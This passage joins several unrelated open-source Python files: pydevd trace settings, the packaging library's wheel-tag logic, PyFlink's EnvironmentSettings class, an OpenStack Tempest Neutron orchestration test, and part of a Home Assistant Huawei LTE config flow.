'pydevd_stackless.py': PYDEV_FILE,
'pydevd_tables.py': PYDEV_FILE,
'pydevd_thread_wrappers.py': PYDEV_FILE,
'pydevd_thrift.py': PYDEV_FILE,
'pydevd_trace_api.py': PYDEV_FILE,
'pydevd_trace_dispatch.py': PYDEV_FILE,
'pydevd_trace_dispatch_regular.py': PYDEV_FILE,
'pydevd_traceproperty.py': PYDEV_FILE,
'pydevd_tracing.py': PYDEV_FILE,
'pydevd_utils.py': PYDEV_FILE,
'pydevd_vars.py': PYDEV_FILE,
'pydevd_vm_type.py': PYDEV_FILE,
'pydevd_xml.py': PYDEV_FILE,
'pydevd_console_output.py': PYDEV_FILE,
}
DONT_TRACE['pydev_jupyter_plugin.py'] = PYDEV_FILE
DONT_TRACE['pydev_jupyter_utils.py'] = PYDEV_FILE
if IS_PY3K:
# if we try to trace io.py it seems it can get halted (see http://bugs.python.org/issue4716)
DONT_TRACE['io.py'] = LIB_FILE
# Don't trace common encodings too
DONT_TRACE['cp1252.py'] = LIB_FILE
DONT_TRACE['utf_8.py'] = LIB_FILE
|
import logging
import platform
import sys
import sysconfig
from importlib.machinery import EXTENSION_SUFFIXES
from typing import (
Dict,
FrozenSet,
Iterable,
Iterator,
List,
Optional,
Sequence,
Tuple,
Union,
cast,
)
from . import _manylinux, _musllinux
logger = logging.getLogger(__name__)
PythonVersion = Sequence[int]
MacVersion = Tuple[int, int]
INTERPRETER_SHORT_NAMES: Dict[str, str] = {
"python": "py", # Generic.
"cpython": "cp",
"pypy": "pp",
"ironpython": "ip",
"jython": "jy",
}
_32_BIT_INTERPRETER = sys.maxsize <= 2 ** 32
class Tag:
"""
A representation of the tag triple for a wheel.
Instances are considered immutable and thus are hashable. Equality checking
is also supported.
"""
__slots__ = ["_interpreter", "_abi", "_platform", "_hash"]
def __init__(self, interpreter: str, abi: str, platform: str) -> None:
self._interpreter = interpreter.lower()
self._abi = abi.lower()
self._platform = platform.lower()
# The __hash__ of every single element in a Set[Tag] will be evaluated each time
# that a set calls its `.disjoint()` method, which may be called hundreds of
# times when scanning a page of links for packages with tags matching that
# Set[Tag]. Pre-computing the value here produces significant speedups for
# downstream consumers.
self._hash = hash((self._interpreter, self._abi, self._platform))
@property
def interpreter(self) -> str:
return self._interpreter
@property
def abi(self) -> str:
return self._abi
@property
def platform(self) -> str:
return self._platform
def __eq__(self, other: object) -> bool:
if not isinstance(other, Tag):
return NotImplemented
return (
(self._hash == other._hash) # Short-circuit ASAP for perf reasons.
and (self._platform == other._platform)
and (self._abi == other._abi)
and (self._interpreter == other._interpreter)
)
def __hash__(self) -> int:
return self._hash
def __str__(self) -> str:
return f"{self._interpreter}-{self._abi}-{self._platform}"
def __repr__(self) -> str:
return "<{self} @ {self_id}>".format(self=self, self_id=id(self))
def parse_tag(tag: str) -> FrozenSet[Tag]:
"""
Parses the provided tag (e.g. `py3-none-any`) into a frozenset of Tag instances.
Returning a set is required due to the possibility that the tag is a
compressed tag set.
"""
tags = set()
interpreters, abis, platforms = tag.split("-")
for interpreter in interpreters.split("."):
for abi in abis.split("."):
for platform_ in platforms.split("."):
tags.add(Tag(interpreter, abi, platform_))
return frozenset(tags)
def _get_config_var(name: str, warn: bool = False) -> Union[int, str, None]:
value = sysconfig.get_config_var(name)
if value is None and warn:
logger.debug(
"Config variable '%s' is unset, Python ABI tag may be incorrect", name
)
return value
def _normalize_string(string: str) -> str:
return string.replace(".", "_").replace("-", "_")
def _abi3_applies(python_version: PythonVersion) -> bool:
"""
Determine if the Python version supports abi3.
PEP 384 was first implemented in Python 3.2.
"""
return len(python_version) > 1 and tuple(python_version) >= (3, 2)
def _cpython_abis(py_version: PythonVersion, warn: bool = False) -> List[str]:
py_version = tuple(py_version) # To allow for version comparison.
abis = []
version = _version_nodot(py_version[:2])
debug = pymalloc = ucs4 = ""
with_debug = _get_config_var("Py_DEBUG", warn)
has_refcount = hasattr(sys, "gettotalrefcount")
# Windows doesn't set Py_DEBUG, so checking for support of debug-compiled
# extension modules is the best option.
# https://github.com/pypa/pip/issues/3383#issuecomment-173267692
has_ext = "_d.pyd" in EXTENSION_SUFFIXES
if with_debug or (with_debug is None and (has_refcount or has_ext)):
debug = "d"
if py_version < (3, 8):
with_pymalloc = _get_config_var("WITH_PYMALLOC", warn)
if with_pymalloc or with_pymalloc is None:
pymalloc = "m"
if py_version < (3, 3):
unicode_size = _get_config_var("Py_UNICODE_SIZE", warn)
if unicode_size == 4 or (
unicode_size is None and sys.maxunicode == 0x10FFFF
):
ucs4 = "u"
elif debug:
# Debug builds can also load "normal" extension modules.
# We can also assume no UCS-4 or pymalloc requirement.
abis.append(f"cp{version}")
abis.insert(
0,
"cp{version}{debug}{pymalloc}{ucs4}".format(
version=version, debug=debug, pymalloc=pymalloc, ucs4=ucs4
),
)
return abis
def cpython_tags(
python_version: Optional[PythonVersion] = None,
abis: Optional[Iterable[str]] = None,
platforms: Optional[Iterable[str]] = None,
*,
warn: bool = False,
) -> Iterator[Tag]:
"""
Yields the tags for a CPython interpreter.
The tags consist of:
- cp<python_version>-<abi>-<platform>
- cp<python_version>-abi3-<platform>
- cp<python_version>-none-<platform>
- cp<less than python_version>-abi3-<platform> # Older Python versions down to 3.2.
If python_version only specifies a major version then user-provided ABIs and
the 'none' ABItag will be used.
If 'abi3' or 'none' are specified in 'abis' then they will be yielded at
their normal position and not at the beginning.
"""
if not python_version:
python_version = sys.version_info[:2]
interpreter = "cp{}".format(_version_nodot(python_version[:2]))
if abis is None:
if len(python_version) > 1:
abis = _cpython_abis(python_version, warn)
else:
abis = []
abis = list(abis)
# 'abi3' and 'none' are explicitly handled later.
for explicit_abi in ("abi3", "none"):
try:
abis.remove(explicit_abi)
except ValueError:
pass
platforms = list(platforms or platform_tags())
for abi in abis:
for platform_ in platforms:
yield Tag(interpreter, abi, platform_)
if _abi3_applies(python_version):
yield from (Tag(interpreter, "abi3", platform_) for platform_ in platforms)
yield from (Tag(interpreter, "none", platform_) for platform_ in platforms)
if _abi3_applies(python_version):
for minor_version in range(python_version[1] - 1, 1, -1):
for platform_ in platforms:
interpreter = "cp{version}".format(
version=_version_nodot((python_version[0], minor_version))
)
yield Tag(interpreter, "abi3", platform_)
def _generic_abi() -> Iterator[str]:
abi = sysconfig.get_config_var("SOABI")
if abi:
yield _normalize_string(abi)
def generic_tags(
interpreter: Optional[str] = None,
abis: Optional[Iterable[str]] = None,
platforms: Optional[Iterable[str]] = None,
*,
warn: bool = False,
) -> Iterator[Tag]:
"""
Yields the tags for a generic interpreter.
The tags consist of:
- <interpreter>-<abi>-<platform>
The "none" ABI will be added if it was not explicitly provided.
"""
if not interpreter:
interp_name = interpreter_name()
interp_version = interpreter_version(warn=warn)
interpreter = "".join([interp_name, interp_version])
if abis is None:
abis = _generic_abi()
platforms = list(platforms or platform_tags())
abis = list(abis)
if "none" not in abis:
abis.append("none")
for abi in abis:
for platform_ in platforms:
yield Tag(interpreter, abi, platform_)
def _py_interpreter_range(py_version: PythonVersion) -> Iterator[str]:
"""
Yields Python versions in descending order.
After the latest version, the major-only version will be yielded, and then
all previous versions of that major version.
"""
if len(py_version) > 1:
yield "py{version}".format(version=_version_nodot(py_version[:2]))
yield "py{major}".format(major=py_version[0])
if len(py_version) > 1:
for minor in range(py_version[1] - 1, -1, -1):
yield "py{version}".format(version=_version_nodot((py_version[0], minor)))
def compatible_tags(
python_version: Optional[PythonVersion] = None,
interpreter: Optional[str] = None,
platforms: Optional[Iterable[str]] = None,
) -> Iterator[Tag]:
"""
Yields the sequence of tags that are compatible with a specific version of Python.
The tags consist of:
- py*-none-<platform>
- <interpreter>-none-any # ... if `interpreter` is provided.
- py*-none-any
"""
if not python_version:
python_version = sys.version_info[:2]
platforms = list(platforms or platform_tags())
for version in _py_interpreter_range(python_version):
for platform_ in platforms:
yield Tag(version, "none", platform_)
if interpreter:
yield Tag(interpreter, "none", "any")
for version in _py_interpreter_range(python_version):
yield Tag(version, "none", "any")
def _mac_arch(arch: str, is_32bit: bool = _32_BIT_INTERPRETER) -> str:
if not is_32bit:
return arch
if arch.startswith("ppc"):
return "ppc"
return "i386"
def _mac_binary_formats(version: MacVersion, cpu_arch: str) -> List[str]:
formats = [cpu_arch]
if cpu_arch == "x86_64":
if version < (10, 4):
return []
formats.extend(["intel", "fat64", "fat32"])
elif cpu_arch == "i386":
if version < (10, 4):
return []
formats.extend(["intel", "fat32", "fat"])
elif cpu_arch == "ppc64":
# TODO: Need to care about 32-bit PPC for ppc64 through 10.2?
if version > (10, 5) or version < (10, 4):
return []
formats.append("fat64")
elif cpu_arch == "ppc":
if version > (10, 6):
return []
formats.extend(["fat32", "fat"])
if cpu_arch in {"arm64", "x86_64"}:
formats.append("universal2")
if cpu_arch in {"x86_64", "i386", "ppc64", "ppc", "intel"}:
formats.append("universal")
return formats
def mac_platforms(
version: Optional[MacVersion] = None, arch: Optional[str] = None
) -> Iterator[str]:
"""
Yields the platform tags for a macOS system.
The `version` parameter is a two-item tuple specifying the macOS version to
generate platform tags for. The `arch` parameter is the CPU architecture to
generate platform tags for. Both parameters default to the appropriate value
for the current system.
"""
version_str, _, cpu_arch = platform.mac_ver()
if version is None:
version = cast("MacVersion", tuple(map(int, version_str.split(".")[:2])))
else:
version = version
if arch is None:
arch = _mac_arch(cpu_arch)
else:
arch = arch
if (10, 0) <= version and version < (11, 0):
# Prior to Mac OS 11, each yearly release of Mac OS bumped the
# "minor" version number. The major version was always 10.
for minor_version in range(version[1], -1, -1):
compat_version = 10, minor_version
binary_formats = _mac_binary_formats(compat_version, arch)
for binary_format in binary_formats:
yield "macosx_{major}_{minor}_{binary_format}".format(
major=10, minor=minor_version, binary_format=binary_format
)
if version >= (11, 0):
# Starting with Mac OS 11, each yearly release bumps the major version
# number. The minor versions are now the midyear updates.
for major_version in range(version[0], 10, -1):
compat_version = major_version, 0
binary_formats = _mac_binary_formats(compat_version, arch)
for binary_format in binary_formats:
yield "macosx_{major}_{minor}_{binary_format}".format(
major=major_version, minor=0, binary_format=binary_format
)
if version >= (11, 0):
# Mac OS 11 on x86_64 is compatible with binaries from previous releases.
# Arm64 support was introduced in 11.0, so no Arm binaries from previous
# releases exist.
#
# However, the "universal2" binary format can have a
# macOS version earlier than 11.0 when the x86_64 part of the binary supports
# that version of macOS.
if arch == "x86_64":
for minor_version in range(16, 3, -1):
compat_version = 10, minor_version
binary_formats = _mac_binary_formats(compat_version, arch)
for binary_format in binary_formats:
yield "macosx_{major}_{minor}_{binary_format}".format(
major=compat_version[0],
minor=compat_version[1],
binary_format=binary_format,
)
else:
for minor_version in range(16, 3, -1):
compat_version = 10, minor_version
binary_format = "universal2"
yield "macosx_{major}_{minor}_{binary_format}".format(
major=compat_version[0],
minor=compat_version[1],
binary_format=binary_format,
)
def _linux_platforms(is_32bit: bool = _32_BIT_INTERPRETER) -> Iterator[str]:
linux = _normalize_string(sysconfig.get_platform())
if is_32bit:
if linux == "linux_x86_64":
linux = "linux_i686"
elif linux == "linux_aarch64":
linux = "linux_armv7l"
_, arch = linux.split("_", 1)
yield from _manylinux.platform_tags(linux, arch)
yield from _musllinux.platform_tags(arch)
yield linux
def _generic_platforms() -> Iterator[str]:
yield _normalize_string(sysconfig.get_platform())
def platform_tags() -> Iterator[str]:
"""
Provides the platform tags for this installation.
"""
if platform.system() == "Darwin":
return mac_platforms()
elif platform.system() == "Linux":
return _linux_platforms()
else:
return _generic_platforms()
def interpreter_name() -> str:
"""
Returns the name of the running interpreter.
"""
name = sys.implementation.name
return INTERPRETER_SHORT_NAMES.get(name) or name
def interpreter_version(*, warn: bool = False) -> str:
"""
Returns the version of the running interpreter.
"""
version = _get_config_var("py_version_nodot", warn=warn)
if version:
version = str(version)
else:
version = _version_nodot(sys.version_info[:2])
return version
def _version_nodot(version: PythonVersion) -> str:
return "".join(map(str, version))
def sys_tags(*, warn: bool = False) -> Iterator[Tag]:
"""
Returns the sequence of tag triples for the running interpreter.
The order of the sequence corresponds to priority order for the
interpreter, from most to least important.
"""
interp_name = interpreter_name()
if interp_name == "cp":
yield from cpython_tags(warn=warn)
else:
yield from generic_tags()
yield from compatible_tags()
|
from pyflink.java_gateway import get_gateway
from pyflink.common import Configuration
__all__ = ['EnvironmentSettings']
class EnvironmentSettings(object):
"""
Defines all parameters that initialize a table environment. Those parameters are used only
during instantiation of a :class:`~pyflink.table.TableEnvironment` and cannot be changed
afterwards.
Example:
::
>>> EnvironmentSettings.new_instance() \\
... .in_streaming_mode() \\
... .with_built_in_catalog_name("my_catalog") \\
... .with_built_in_database_name("my_database") \\
... .build()
:func:`EnvironmentSettings.in_streaming_mode` or :func:`EnvironmentSettings.in_batch_mode`
might be convenient as shortcuts.
"""
class Builder(object):
"""
A builder for :class:`EnvironmentSettings`.
"""
def __init__(self):
gateway = get_gateway()
self._j_builder = gateway.jvm.EnvironmentSettings.Builder()
def in_batch_mode(self) -> 'EnvironmentSettings.Builder':
"""
Sets that the components should work in a batch mode. Streaming mode by default.
:return: This object.
"""
self._j_builder = self._j_builder.inBatchMode()
return self
def in_streaming_mode(self) -> 'EnvironmentSettings.Builder':
"""
Sets that the components should work in a streaming mode. Enabled by default.
:return: This object.
"""
self._j_builder = self._j_builder.inStreamingMode()
return self
def with_built_in_catalog_name(self, built_in_catalog_name: str) \
-> 'EnvironmentSettings.Builder':
"""
Specifies the name of the initial catalog to be created when instantiating
a :class:`~pyflink.table.TableEnvironment`.
This catalog is an in-memory catalog that will be used to store all temporary objects
(e.g. from :func:`~pyflink.table.TableEnvironment.create_temporary_view` or
:func:`~pyflink.table.TableEnvironment.create_temporary_system_function`) that cannot
be persisted because they have no serializable representation.
It will also be the initial value for the current catalog which can be altered via
:func:`~pyflink.table.TableEnvironment.use_catalog`.
Default: "default_catalog".
:param built_in_catalog_name: The specified built-in catalog name.
:return: This object.
"""
self._j_builder = self._j_builder.withBuiltInCatalogName(built_in_catalog_name)
return self
def with_built_in_database_name(self, built_in_database_name: str) \
-> 'EnvironmentSettings.Builder':
"""
Specifies the name of the default database in the initial catalog to be
created when instantiating a :class:`~pyflink.table.TableEnvironment`.
This database is an in-memory database that will be used to store all temporary
objects (e.g. from :func:`~pyflink.table.TableEnvironment.create_temporary_view` or
:func:`~pyflink.table.TableEnvironment.create_temporary_system_function`) that cannot
be persisted because they have no serializable representation.
It will also be the initial value for the current catalog which can be altered via
:func:`~pyflink.table.TableEnvironment.use_catalog`.
Default: "default_database".
:param built_in_database_name: The specified built-in database name.
:return: This object.
"""
self._j_builder = self._j_builder.withBuiltInDatabaseName(built_in_database_name)
return self
def build(self) -> 'EnvironmentSettings':
"""
Returns an immutable instance of EnvironmentSettings.
:return: an immutable instance of EnvironmentSettings.
"""
return EnvironmentSettings(self._j_builder.build())
def __init__(self, j_environment_settings):
self._j_environment_settings = j_environment_settings
def get_built_in_catalog_name(self) -> str:
"""
Gets the specified name of the initial catalog to be created when instantiating a
:class:`~pyflink.table.TableEnvironment`.
:return: The specified name of the initial catalog to be created.
"""
return self._j_environment_settings.getBuiltInCatalogName()
def get_built_in_database_name(self) -> str:
"""
Gets the specified name of the default database in the initial catalog to be created when
instantiating a :class:`~pyflink.table.TableEnvironment`.
:return: The specified name of the default database in the initial catalog to be created.
"""
return self._j_environment_settings.getBuiltInDatabaseName()
def is_streaming_mode(self) -> bool:
"""
Tells if the :class:`~pyflink.table.TableEnvironment` should work in a batch or streaming
mode.
:return: True if the TableEnvironment should work in a streaming mode, false otherwise.
"""
return self._j_environment_settings.isStreamingMode()
def to_configuration(self) -> Configuration:
"""
Convert to `pyflink.common.Configuration`.
:return: Configuration with specified value.
"""
return Configuration(j_configuration=self._j_environment_settings.toConfiguration())
@staticmethod
def new_instance() -> 'EnvironmentSettings.Builder':
"""
Creates a builder for creating an instance of EnvironmentSettings.
:return: A builder of EnvironmentSettings.
"""
return EnvironmentSettings.Builder()
@staticmethod
def from_configuration(config: Configuration) -> 'EnvironmentSettings':
"""
Creates the EnvironmentSetting with specified Configuration.
:return: EnvironmentSettings.
"""
return EnvironmentSettings(
get_gateway().jvm.EnvironmentSettings.fromConfiguration(config._j_configuration))
@staticmethod
def in_streaming_mode() -> 'EnvironmentSettings':
"""
Creates a default instance of EnvironmentSettings in streaming execution mode.
In this mode, both bounded and unbounded data streams can be processed.
This method is a shortcut for creating a :class:`~pyflink.table.TableEnvironment` with
little code. Use the builder provided in :func:`EnvironmentSettings.new_instance` for
advanced settings.
:return: EnvironmentSettings.
"""
return EnvironmentSettings(
get_gateway().jvm.EnvironmentSettings.inStreamingMode())
@staticmethod
def in_batch_mode() -> 'EnvironmentSettings':
"""
Creates a default instance of EnvironmentSettings in batch execution mode.
This mode is highly optimized for batch scenarios. Only bounded data streams can be
processed in this mode.
This method is a shortcut for creating a :class:`~pyflink.table.TableEnvironment` with
little code. Use the builder provided in :func:`EnvironmentSettings.new_instance` for
advanced settings.
:return: EnvironmentSettings.
"""
return EnvironmentSettings(
get_gateway().jvm.EnvironmentSettings.inBatchMode())
|
import logging
import netaddr
from tempest_lib.common.utils import data_utils
from tempest.api.orchestration import base
from tempest import clients
from tempest import config
from tempest import exceptions
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class NeutronResourcesTestJSON(base.BaseOrchestrationTest):
@classmethod
def skip_checks(cls):
super(NeutronResourcesTestJSON, cls).skip_checks()
if not CONF.service_available.neutron:
raise cls.skipException("Neutron support is required")
@classmethod
def setup_credentials(cls):
super(NeutronResourcesTestJSON, cls).setup_credentials()
cls.os = clients.Manager()
@classmethod
def setup_clients(cls):
super(NeutronResourcesTestJSON, cls).setup_clients()
cls.network_client = cls.os.network_client
@classmethod
def resource_setup(cls):
super(NeutronResourcesTestJSON, cls).resource_setup()
cls.neutron_basic_template = cls.load_template('neutron_basic')
cls.stack_name = data_utils.rand_name('heat')
template = cls.read_template('neutron_basic')
cls.keypair_name = (CONF.orchestration.keypair_name or
cls._create_keypair()['name'])
cls.external_network_id = CONF.network.public_network_id
tenant_cidr = netaddr.IPNetwork(CONF.network.tenant_network_cidr)
mask_bits = CONF.network.tenant_network_mask_bits
cls.subnet_cidr = tenant_cidr.subnet(mask_bits).next()
# create the stack
cls.stack_identifier = cls.create_stack(
cls.stack_name,
template,
parameters={
'KeyName': cls.keypair_name,
'InstanceType': CONF.orchestration.instance_type,
'ImageId': CONF.compute.image_ref,
'ExternalNetworkId': cls.external_network_id,
'timeout': CONF.orchestration.build_timeout,
'DNSServers': CONF.network.dns_servers,
'SubNetCidr': str(cls.subnet_cidr)
})
cls.stack_id = cls.stack_identifier.split('/')[1]
try:
cls.client.wait_for_stack_status(cls.stack_id, 'CREATE_COMPLETE')
resources = cls.client.list_resources(cls.stack_identifier)
except exceptions.TimeoutException as e:
if CONF.compute_feature_enabled.console_output:
# attempt to log the server console to help with debugging
# the cause of the server not signalling the waitcondition
# to heat.
body = cls.client.show_resource(cls.stack_identifier,
'Server')
server_id = body['physical_resource_id']
LOG.debug('Console output for %s', server_id)
output = cls.servers_client.get_console_output(
server_id, None).data
LOG.debug(output)
raise e
cls.test_resources = {}
for resource in resources:
cls.test_resources[resource['logical_resource_id']] = resource
@test.idempotent_id('f9e2664c-bc44-4eef-98b6-495e4f9d74b3')
def test_created_resources(self):
"""Verifies created neutron resources."""
resources = [('Network', self.neutron_basic_template['resources'][
'Network']['type']),
('Subnet', self.neutron_basic_template['resources'][
'Subnet']['type']),
('RouterInterface', self.neutron_basic_template[
'resources']['RouterInterface']['type']),
('Server', self.neutron_basic_template['resources'][
'Server']['type'])]
for resource_name, resource_type in resources:
resource = self.test_resources.get(resource_name, None)
self.assertIsInstance(resource, dict)
self.assertEqual(resource_name, resource['logical_resource_id'])
self.assertEqual(resource_type, resource['resource_type'])
self.assertEqual('CREATE_COMPLETE', resource['resource_status'])
@test.idempotent_id('c572b915-edb1-4e90-b196-c7199a6848c0')
@test.services('network')
def test_created_network(self):
"""Verifies created network."""
network_id = self.test_resources.get('Network')['physical_resource_id']
body = self.network_client.show_network(network_id)
network = body['network']
self.assertIsInstance(network, dict)
self.assertEqual(network_id, network['id'])
self.assertEqual(self.neutron_basic_template['resources'][
'Network']['properties']['name'], network['name'])
@test.idempotent_id('e8f84b96-f9d7-4684-ad5f-340203e9f2c2')
@test.services('network')
def test_created_subnet(self):
"""Verifies created subnet."""
subnet_id = self.test_resources.get('Subnet')['physical_resource_id']
body = self.network_client.show_subnet(subnet_id)
subnet = body['subnet']
network_id = self.test_resources.get('Network')['physical_resource_id']
self.assertEqual(subnet_id, subnet['id'])
self.assertEqual(network_id, subnet['network_id'])
self.assertEqual(self.neutron_basic_template['resources'][
'Subnet']['properties']['name'], subnet['name'])
self.assertEqual(sorted(CONF.network.dns_servers),
sorted(subnet['dns_nameservers']))
self.assertEqual(self.neutron_basic_template['resources'][
'Subnet']['properties']['ip_version'], subnet['ip_version'])
self.assertEqual(str(self.subnet_cidr), subnet['cidr'])
@test.idempotent_id('96af4c7f-5069-44bc-bdcf-c0390f8a67d1')
@test.services('network')
def test_created_router(self):
"""Verifies created router."""
router_id = self.test_resources.get('Router')['physical_resource_id']
body = self.network_client.show_router(router_id)
router = body['router']
self.assertEqual(self.neutron_basic_template['resources'][
'Router']['properties']['name'], router['name'])
self.assertEqual(self.external_network_id,
router['external_gateway_info']['network_id'])
self.assertEqual(True, router['admin_state_up'])
@test.idempotent_id('89f605bd-153e-43ee-a0ed-9919b63423c5')
@test.services('network')
def test_created_router_interface(self):
"""Verifies created router interface."""
router_id = self.test_resources.get('Router')['physical_resource_id']
network_id = self.test_resources.get('Network')['physical_resource_id']
subnet_id = self.test_resources.get('Subnet')['physical_resource_id']
body = self.network_client.list_ports()
ports = body['ports']
router_ports = filter(lambda port: port['device_id'] ==
router_id, ports)
created_network_ports = filter(lambda port: port['network_id'] ==
network_id, router_ports)
self.assertEqual(1, len(created_network_ports))
router_interface = created_network_ports[0]
fixed_ips = router_interface['fixed_ips']
subnet_fixed_ips = filter(lambda port: port['subnet_id'] ==
subnet_id, fixed_ips)
self.assertEqual(1, len(subnet_fixed_ips))
router_interface_ip = subnet_fixed_ips[0]['ip_address']
self.assertEqual(str(self.subnet_cidr.iter_hosts().next()),
router_interface_ip)
@test.idempotent_id('75d85316-4ac2-4c0e-a1a9-edd2148fc10e')
@test.services('compute', 'network')
def test_created_server(self):
"""Verifies created sever."""
server_id = self.test_resources.get('Server')['physical_resource_id']
server = self.servers_client.get_server(server_id)
self.assertEqual(self.keypair_name, server['key_name'])
self.assertEqual('ACTIVE', server['status'])
network = server['addresses'][self.neutron_basic_template['resources'][
'Network']['properties']['name']][0]
self.assertEqual(4, network['version'])
self.assertIn(netaddr.IPAddress(network['addr']), self.subnet_cidr)
|
"""Config flow for the Huawei LTE platform."""
from __future__ import annotations
import logging
from typing import Any
from urllib.parse import urlparse
from huawei_lte_api.AuthorizedConnection import AuthorizedConnection
from huawei_lte_api.Client import Client
from huawei_lte_api.Connection import GetResponseType
from huawei_lte_api.exceptions import (
LoginErrorPasswordWrongException,
LoginErrorUsernamePasswordOverrunException,
LoginErrorUsernamePasswordWrongException,
LoginErrorUsernameWrongException,
ResponseErrorException,
)
from requests.exceptions import Timeout
from url_normalize import url_normalize
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import ssdp
from homeassistant.const import (
CONF_MAC,
CONF_NAME,
CONF_PASSWORD,
CONF_RECIPIENT,
CONF_URL,
CONF_USERNAME,
)
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.typing import DiscoveryInfoType
from .const import (
CONF_TRACK_WIRED_CLIENTS,
CONF_UNAUTHENTICATED_MODE,
CONNECTION_TIMEOUT,
DEFAULT_DEVICE_NAME,
DEFAULT_NOTIFY_SERVICE_NAME,
DEFAULT_TRACK_WIRED_CLIENTS,
DEFAULT_UNAUTHENTICATED_MODE,
DOMAIN,
)
from .utils import get_device_macs
_LOGGER = logging.getLogger(__name__)
class ConfigFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle Huawei LTE config flow."""
VERSION = 3
@staticmethod
@callback
def async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> OptionsFlowHandler:
"""Get options flow."""
return OptionsFlowHandler(config_entry)
async def _async_show_user_form(
self,
user_input: dict[str, Any] | None = None,
errors: dict[str, str] | None = None,
) -> FlowResult:
if user_input is None:
user_input = {}
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(
{
vol.Required(
CONF_URL,
default=user_input.get(
CONF_URL,
self.context.get(CONF_URL, ""),
),
): str,
vol.Optional(
CONF_USERNAME, default=user_input.get(CONF_USERNAME) or ""
): str,
vol.Optional(
CONF_PASSWORD, default=user_input.get(CONF_PASSWORD) or ""
): str,
}
),
errors=errors or {},
)
async def async_step_import(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle import initiated config flow."""
return await self.async_step_user(user_input)
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle user initiated config flow."""
if user_input is None:
return await self._async_show_user_form()
errors = {}
# Normalize URL
user_input[CONF_URL] = url_normalize(
user_input[CONF_URL], default_scheme="http"
)
if "://" not in user_input[CONF_URL]:
errors[CONF_URL] = "invalid_url"
return await self._async_show_user_form(
user_input=user_input, errors=errors
)
conn: AuthorizedConnection
def logout() -> None:
try:
conn.user.logout()
except Exception: # pylint: disable=broad-except
_LOGGER.debug("Could not logout", exc_info=True)
def try_connect(user_input: dict[str, Any]) -> AuthorizedConnection:
"""Try connecting with given credentials."""
username = user_input.get(CONF_USERNAME) or ""
password = user_input.get(CONF_PASSWORD) or ""
conn = AuthorizedConnection(
user_input[CONF_URL],
username=username,
password=password,
timeout=CONNECTION_TIMEOUT,
)
return conn
def get_device_info() -> tuple[GetResponseType, GetResponseType]:
"""Get router info."""
client = Client(conn)
try:
device_info = client.device.information()
except Exception: # pylint: disable=broad-except
_LOGGER.debug("Could not get device.information", exc_info=True)
try:
device_info = client.device.basic_information()
except Exception: # pylint: disable=broad-except
_LOGGER.debug(
"Could not get device.basic_information", exc_info=True
)
device_info = {}
try:
wlan_settings = client.wlan.multi_basic_settings()
except Exception: # pylint: disable=broad-except
_LOGGER.debug("Could not get wlan.multi_basic_settings", exc_info=True)
wlan_settings = {}
return device_info, wlan_settings
try:
conn = await self.hass.async_add_executor_job(try_connect, user_input)
except LoginErrorUsernameWrongException:
errors[CONF_USERNAME] = "incorrect_username"
except LoginErrorPasswordWrongException:
errors[CONF_PASSWORD] = "incorrect_password"
except LoginErrorUsernamePasswordWrongException:
errors[CONF_USERNAME] = "invalid_auth"
except LoginErrorUsernamePasswordOverrunException:
errors["base"] = "login_attempts_exceeded"
except ResponseErrorException:
_LOGGER.warning("Response error", exc_info=True)
errors["base"] = "response_error"
except Timeout:
_LOGGER.warning("Connection timeout", exc_info=True)
errors[CONF_URL] = "connection_timeout"
except Exception: # pylint: disable=broad-except
_LOGGER.warning("Unknown error connecting to device", exc_info=True)
errors[CONF_URL] = "unknown"
if errors:
await self.hass.async_add_executor_job(logout)
return await self._async_show_user_form(
user_input=user_input, errors=errors
)
info, wlan_settings = await self.hass.async_add_executor_job(get_device_info)
await self.hass.async_add_executor_job(logout)
if not self.unique_id:
if serial_number := info.get("SerialNumber"):
await self.async_set_unique_id(serial_number)
self._abort_if_unique_id_configured()
else:
await self._async_handle_discovery_without_unique_id()
user_input[CONF_MAC] = get_device_macs(info, wlan_settings)
title = (
self.context.get("title_placeholders", {}).get(CONF_NAME)
or info.get("DeviceName") # device.information
or info.get("devicename") # device.basic_information
or DEFAULT_DEVICE_NAME
)
return self.async_create_entry(title=title, data=user_input)
async def async_step_ssdp(self, discovery_info: DiscoveryInfoType) -> FlowResult:
"""Handle SSDP initiated config flow."""
await self.async_set_unique_id(discovery_info[ssdp.ATTR_UPNP_UDN])
self._abort_if_unique_id_configured()
# Attempt to distinguish from other non-LTE Huawei router devices, at least
# some ones we are interested in have "Mobile Wi-Fi" friendlyName.
if "mobile" not in discovery_info.get(ssdp.ATTR_UPNP_FRIENDLY_NAME, "").lower():
return self.async_abort(reason="not_huawei_lte")
url = url_normalize(
discovery_info.get(
ssdp.ATTR_UPNP_PRESENTATION_URL,
f"http://{urlparse(discovery_info[ssdp.ATTR_SSDP_LOCATION]).hostname}/",
)
)
if serial_number := discovery_info.get(ssdp.ATTR_UPNP_SERIAL):
await self.async_set_unique_id(serial_number)
self._abort_if_unique_id_configured()
else:
await self._async_handle_discovery_without_unique_id()
user_input = {CONF_URL: url}
self.context["title_placeholders"] = {
CONF_NAME: discovery_info.get(ssdp.ATTR_UPNP_FRIENDLY_NAME)
}
return await self._async_show_user_form(user_input)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Huawei LTE options flow."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Initialize options flow."""
self.config_entry = config_entry
async def async_step_init(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle options flow."""
# Recipients are persisted as a list, but handled as comma separated string in UI
if user_input is not None:
# Preserve existing options, for example *_from_yaml markers
data = {**self.config_entry.options, **user_input}
if not isinstance(data[CONF_RECIPIENT], list):
data[CONF_RECIPIENT] = [
x.strip() for x in data[CONF_RECIPIENT].split(",")
]
return self.async_create_entry(title="", data=data)
data_schema = vol.Schema(
{
vol.Optional(
CONF_NAME,
default=self.config_entry.options.get(
CONF_NAME, DEFAULT_NOTIFY_SERVICE_NAME
),
): str,
vol.Optional(
CONF_RECIPIENT,
default=", ".join(
self.config_entry.options.get(CONF_RECIPIENT, [])
),
): str,
vol.Optional(
CONF_TRACK_WIRED_CLIENTS,
default=self.config_entry.options.get(
